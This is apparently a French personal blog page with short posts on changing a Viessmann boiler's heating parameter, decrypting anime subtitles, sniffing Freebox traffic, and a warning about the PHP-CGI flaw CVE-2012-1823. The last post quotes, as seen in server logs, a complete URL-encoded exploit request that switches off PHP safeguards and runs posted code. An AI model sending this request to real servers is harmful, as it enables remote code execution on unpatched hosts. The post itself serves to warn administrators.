Chaudière Viessmann qui chauffe tout le temps

Ma chaudière (Viessmann piloté par régulation Vitotronic 200 type KO2B) a une valeur par défaut « que je trouve débile » dont mon installateur n’a pas pris soin de modifier. S’il fait moins de 3°c à la sonde extérieure, la chaudière chauffe tout le temps en ignorant les horaires de chauffe indiqués ! Autant vous dire que vous allez consommer et avoir trop chaud… !

On pourra changer ce comportement absurde en accédant aux paramétrages avancés (mode maintenance, codage de niveau 2), en appuyant 4s sur « menu » et « ok », puis 4s sur « ok » et « retour ».

Dans les paramètres « circuit du chauffage » on pourra modifier la valeur A3 :

chauffage
Page du manuel réservé aux installateurs… Que j’ai pu choper sur Internet ! :3

Pour ma part, j’ai choisis la valeur -3, ce qui permettra de déclencher la chaudière en dehors des heures de chauffe, seulement si la température extérieure est ≤ -2°c

Source : Bricozone
Histoire Twitter

Déchiffrer les sous-titres KZPlay + capture vidéo

KZPlay était une ancienne plate-forme de VOD d’animés dont les vidéos possédait des sous-titres « softsubs » non intégrés à la vidéo.
C’est maintenant ADN qui a pris le relais de cette ancienne plate-forme. ADN utilise toujours des « softsubs », mais la technique de chiffrement n’est pas la même. Je me permets donc de diffuser publiquement cette article comme « étude de cas » qui − à priori − ne nuira pas à KZPlay/ADN.

/!\ Attention, technique /!\

Continue reading “Déchiffrer les sous-titres KZPlay + capture vidéo”

Analyse réseau entre Freebox Player et Freebox Server

Je voulais « m’amuser » à voir comment la Freebox Player communiquait avec la Freebox Server. (Les 2 Freebox HD v6, appelons les fbxP et fbxS).

Pour cela, j’ai mis en place un bridge. L’idée c’est d’avoir un ordinateur avec 2 interfaces réseau (j’ai ajouté une carte usb→ethernet sur mon laptop), on crée le bridge (switch virtuel contenant 2 ports, eth0 et eth1) avec brctl (fourni par bridge-utils) :

Continue reading “Analyse réseau entre Freebox Player et Freebox Server”

Security hole in PHP5.X – CVE-2012-1823

There is a big security hole in PHP5.X (php-cgi) which could be made to execute arbitrary code with the privilege of the web server. There is an public exploit posted on 2013-10-29, and many bots uses it! Security hole was detected in September 2012 and so distributions have already patched php5-cgi package, but if you’re not up-to-date, you’re doomed!

More information :
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
https://security-tracker.debian.org/tracker/CVE-2012-1823
http://www.ubuntu.com/usn/usn-1437-1/

Typical forged request as seen in  Apache logs:

POST /%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E